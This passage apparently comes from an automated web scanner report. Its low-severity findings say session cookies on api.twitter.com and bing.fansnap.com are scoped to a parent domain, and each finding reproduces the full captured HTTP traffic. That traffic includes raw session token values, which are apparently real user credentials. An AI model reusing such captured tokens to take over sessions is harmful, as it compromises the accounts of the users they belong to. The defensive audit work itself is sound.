_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCKPiAkMxAToOcmV0dXJuX3RvIiZodHRwOi8v%250AdHdpdHRlci5jb20vbWljcm9zb2Z0aGVscHM6B2lkIiU2ZGIzOGUyNjFlNjk2%250ANTY1YTdjYzMxZDhlNmM1OWY4MiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxl%250Acjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoMY3NyZl9pZCIlMTEw%250AMGQzYWIzM2YyNjdhMzkwM2M5NTc0M2I0OTU3Mzk%253D--3ed4f45079556305b186c9bf03a6a095afcf79ca; domain=.twitter.com; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline.json?since_id=93339674910801920&include_entities=1&include_available_features=1&contributor_details=true&include_rts=true&user_id=75691804 HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://api.twitter.com/receiver.html
X-Requested-With: XMLHttpRequest
X-Twitter-Polling: true
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: application/json, text/javascript, */*; q=0.01
X-Phx: true
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A130884465537011414; k=173.193.214.243.1311018175028268; __utma=43838368.1598605414.1305368954.1311018185.1311089296.18; __utmb=43838368.1.10.1311089296; __utmc=43838368; __utmz=43838368.1311089296.18.11.utmcsr=microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/systemcenter/en/us/try-it.aspx; __utmv=43838368.lang%3A%20en; _twitter_sess=BAh7CjoOcmV0dXJuX3RvIiZodHRwOi8vdHdpdHRlci5jb20vbWljcm9zb2Z0%250AaGVscHM6D2NyZWF0ZWRfYXRsKwij4gJDMQE6B2lkIiU2ZGIzOGUyNjFlNjk2%250ANTY1YTdjYzMxZDhlNmM1OWY4MiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxl%250Acjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoMY3NyZl9pZCIlMTEw%250AMGQzYWIzM2YyNjdhMzkwM2M5NTc0M2I0OTU3Mzk%253D--6855de8f8319199f3dbe9e47bcf8bfd4a45f5dc5; original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 15:40:44 GMT
Server: hi
Status: 200 OK
X-Transaction: 1311090044-79048-4715
X-RateLimit-Limit: 1000
ETag: "1651d1dd1f63fbc93aeb6731a2f411c3"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Tue, 19 Jul 2011 15:40:44 GMT
X-RateLimit-Remaining: 893
X-Runtime: 0.04807
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114ac0fc3df
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api_phoenix
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 8873dd7bf02da271f1dce1ede6bf8310c2861e18
X-RateLimit-Reset: 1311092891
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCKPiAkMxAToOcmV0dXJuX3RvIiZodHRwOi8v%250AdHdpdHRlci5jb20vbWljcm9zb2Z0aGVscHM6B2lkIiU2ZGIzOGUyNjFlNjk2%250ANTY1YTdjYzMxZDhlNmM1OWY4MiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxl%250Acjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoMY3NyZl9pZCIlMTEw%250AMGQzYWIzM2YyNjdhMzkwM2M5NTc0M2I0OTU3Mzk%253D--3ed4f45079556305b186c9bf03a6a095afcf79ca; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 4544

{"statuses":[],"packed_response_type":"statuses","available_features":{"tweet_stream_retweets_by_others":1,"dashboard_activity_listed":1,"phoenix_tweetbox_talon":1,"tweet_stream_favorites_polling":1,"
...[SNIP]...

13.2. http://bing.fansnap.com/checkout/ajax_verify_availability previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://bing.fansnap.com
Path:	/checkout/ajax_verify_availability

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4AE2XuNBjoLb2Zmc2V0af6QnQ%3D%3D--3b8ed313c2085f574bd844ee8fa643d5b8ec09dd; domain=fansnap.com; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkout/ajax_verify_availability?ticket_set_id=415814268&nolo=true&price=50&ch=bing&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&quantity=2 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DjJVKNBjoLb2Zmc2V0af6QnQ%3D%3D--2e47cba8174115434c5fd0ebde214f2fa1d5eacd

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 603
ETag: "bc79807f30db136aab5d82800c8267ef"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4AE2XuNBjoLb2Zmc2V0af6QnQ%3D%3D--3b8ed313c2085f574bd844ee8fa643d5b8ec09dd; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 21
Connection: close
Content-Type: application/json; charset=utf-8

{"status":"CONTINUE"}

13.3. http://bing.fansnap.com/checkout/clickout/415814268 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://bing.fansnap.com
Path:	/checkout/clickout/415814268

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4B0YQSOBjoLb2Zmc2V0af6QnQ%3D%3D--cad52d757f88a1ee393908a1cef9017cb8688093; domain=fansnap.com; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkout/clickout/415814268?quantity=2&ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DD05uNBjoLb2Zmc2V0af6QnQ%3D%3D--3f60618cc7127ee74d521a0ea1c28b136222eb4a

Response

HTTP/1.1 302 Found
Date: Tue, 19 Jul 2011 18:35:32 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
Cache-Control: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 92
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4B0YQSOBjoLb2Zmc2V0af6QnQ%3D%3D--cad52d757f88a1ee393908a1cef9017cb8688093; domain=fansnap.com; path=/; HttpOnly
Location: http://rover.ebay.com/rover/1/711-53200-19255-0/1?type=2&campid=5336216552&customid=1061888771&item=120749940240&ext=120749940240
Status: 302
Vary: Accept-Encoding
Content-Length: 211
Connection: close
Content-Type: text/html; charset=utf-8

<html><body>You are being <a href="http://rover.ebay.com/rover/1/711-53200-19255-0/1?type=2&campid=5336216552&customid=1061888771&item=120749940240&ext=120749940240">redirected</a>.</b
...[SNIP]...

13.4. http://bing.fansnap.com/checkout/clickout/418563179 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://bing.fansnap.com
Path:	/checkout/clickout/418563179

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4A2rVCRBjoLb2Zmc2V0af6QnQ%3D%3D--28ac37f50b283343a71eb70a2f9c612588bd7793; domain=fansnap.com; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkout/clickout/418563179?quantity=2&ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4AlY%2BiNBjoLb2Zmc2V0af6QnQ%3D%3D--188d6189626cb7901a210ce5a69621d12fd463f4

Response

HTTP/1.1 302 Found
Date: Tue, 19 Jul 2011 18:36:20 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
Cache-Control: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 74
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4A2rVCRBjoLb2Zmc2V0af6QnQ%3D%3D--28ac37f50b283343a71eb70a2f9c612588bd7793; domain=fansnap.com; path=/; HttpOnly
Location: http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=65260005
Status: 302
Vary: Accept-Encoding
Content-Length: 171
Connection: close
Content-Type: text/html; charset=utf-8

<html><body>You are being <a href="http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=65260005">redirected</a>.</body></html>

13.5. http://bing.fansnap.com/checkout/index/415814268 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://bing.fansnap.com
Path:	/checkout/index/415814268

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

